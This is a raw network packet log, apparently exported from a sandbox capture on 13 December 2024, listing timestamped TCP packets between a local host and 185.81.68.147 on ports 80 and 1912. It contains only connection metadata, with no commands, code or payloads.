                                                                                                                                                                Dec 13, 2024 01:37:33.006741047 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.006768942 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.007383108 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.007419109 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.007430077 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.007458925 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.008851051 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.008884907 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.008903027 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.008919954 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.008927107 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.008954048 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.008963108 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.008996964 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.009924889 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.009958982 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.009982109 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.009993076 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.010994911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.011030912 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.011051893 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.011076927 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.011406898 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.011441946 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.011456013 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.011486053 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.012676001 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.012711048 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.012742996 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.012758017 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.013125896 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.013159037 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.013171911 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.013197899 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.014205933 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.014239073 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.014249086 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.014280081 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.015013933 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.015048981 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.015058994 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.015088081 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.015906096 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.015940905 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.015954971 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.015980959 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.016391993 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.016434908 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.016875982 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.016933918 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.017533064 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.017568111 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.017590046 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.017606020 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.018116951 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.018168926 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.018170118 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.018218040 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.019042969 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.019093990 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.019109011 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.019154072 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.020111084 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.020155907 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.020184040 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.020226955 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.020771027 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.020806074 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.020817041 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.020845890 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.021881104 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.021924019 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.021931887 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.021965027 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.022425890 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.022473097 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.022627115 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.022718906 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.023514032 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.023562908 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.023565054 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.023603916 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.024475098 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.024513006 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.024522066 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.024553061 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.030982971 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.031030893 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.031044960 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.031078100 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.031378984 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.031414032 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.031425953 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.031456947 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.031466961 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.032588005 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.032627106 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.032634020 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.032680035 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.033142090 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.033185959 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.036998987 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.037044048 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.038176060 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.038209915 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.038222075 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.038245916 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.038252115 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.038281918 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.038288116 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.038321018 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.039241076 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.039273977 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.039294958 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.039308071 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.039328098 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.039346933 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.040421009 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.040457010 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.040465117 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.040498972 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.041074991 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.041110039 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.041120052 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.041151047 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.041923046 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.041968107 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.041982889 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.042025089 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.067557096 CET4976380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.073493004 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.161554098 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.181041956 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.181078911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.181094885 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.181123018 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.182590008 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.182624102 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.182640076 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.182658911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.182679892 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.182694912 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.182697058 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.182729959 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.182739019 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.182770967 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.183154106 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.183190107 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.183269978 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.183969021 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.184020042 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.184225082 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.184268951 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.185050964 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.185085058 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.185094118 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.185132980 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.185966969 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.186001062 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.186011076 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.186041117 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.187411070 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.187444925 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.187454939 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.187480927 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.187486887 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.187515020 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.187520027 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.187556028 CET8049763185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.187566042 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.187622070 CET4976380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.187673092 CET4976380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.188322067 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.188357115 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.188368082 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.188396931 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.189162970 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.189198017 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.189210892 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.189238071 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.190448046 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.190481901 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.190501928 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.190521955 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.190859079 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.190893888 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.190908909 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.190936089 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.192358017 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.192392111 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.192411900 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.192428112 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.192522049 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.192555904 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.192570925 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.192599058 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.193397045 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.193448067 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.193705082 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.193754911 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.194866896 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.194905043 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.194920063 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.194943905 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.195386887 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.195420027 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.195436954 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.195458889 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.197658062 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.197690010 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.197707891 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.197724104 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.197731972 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.197757006 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.197762012 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.197793007 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.197805882 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.197829962 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.197839975 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.197876930 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.198671103 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.198704958 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.198721886 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.198749065 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.199393034 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.199425936 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.199441910 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.199470997 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.200201035 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.200236082 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.200249910 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.200280905 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.201312065 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.201344967 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.201360941 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.201390982 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.202091932 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.202126980 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.202158928 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.202171087 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.203023911 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.203058004 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.203078032 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.203099012 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.204082966 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.204117060 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.204132080 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.204160929 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.206185102 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.206218958 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.206335068 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.281672001 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.310084105 CET8049763185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.310187101 CET4976380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.431303024 CET8049763185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.612313032 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.618848085 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:33.738528967 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.820683956 CET8049761185.81.68.148192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.820736885 CET4976180192.168.2.5185.81.68.148
                                                                                                                                                                Dec 13, 2024 01:37:33.827222109 CET8049762185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:33.827272892 CET4976280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.058012009 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:34.098504066 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.615421057 CET4976980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.697628021 CET4977080192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.735093117 CET8049769185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:34.735166073 CET4976980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.738554001 CET4976980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.811338902 CET8049763185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:34.811388016 CET8049763185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:34.811444044 CET4976380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.812864065 CET4976380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.817415953 CET8049770185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:34.817522049 CET4977080192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.845196009 CET4977080192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.850542068 CET497381912192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.858181000 CET8049769185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:34.927110910 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:34.932724953 CET8049763185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:34.964848042 CET8049770185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:34.970212936 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.047164917 CET8049771185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.047255993 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.047310114 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.131268024 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.131330967 CET4976280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.131719112 CET4977280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.166982889 CET8049771185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.167045116 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.251389027 CET8049753185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.251465082 CET8049772185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.251517057 CET4975380192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.251564026 CET4977280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.251890898 CET8049762185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.251979113 CET4977280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.252022982 CET4976280192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.286349058 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.286959887 CET8049771185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.288592100 CET497381912192.168.2.5185.81.68.147
